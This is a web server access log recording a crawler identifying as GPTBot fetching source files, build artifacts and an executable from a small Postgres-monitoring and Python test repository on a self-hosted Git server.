"/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" +[17/Feb/2026:13:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11681] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21163] [Gzip 10.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" +[17/Feb/2026:13:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10156] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9538] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10870] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" +[17/Feb/2026:13:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 17773] [Gzip 9.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" +[17/Feb/2026:13:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16562] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13036] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 19729] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:13:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48957] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10141] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9506] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18349] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10178] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17182] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16560] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 22468] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" +[17/Feb/2026:13:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17347] [Gzip 9.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" +[17/Feb/2026:13:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:13:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:13:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:13:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:13:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:13:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:13:13:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 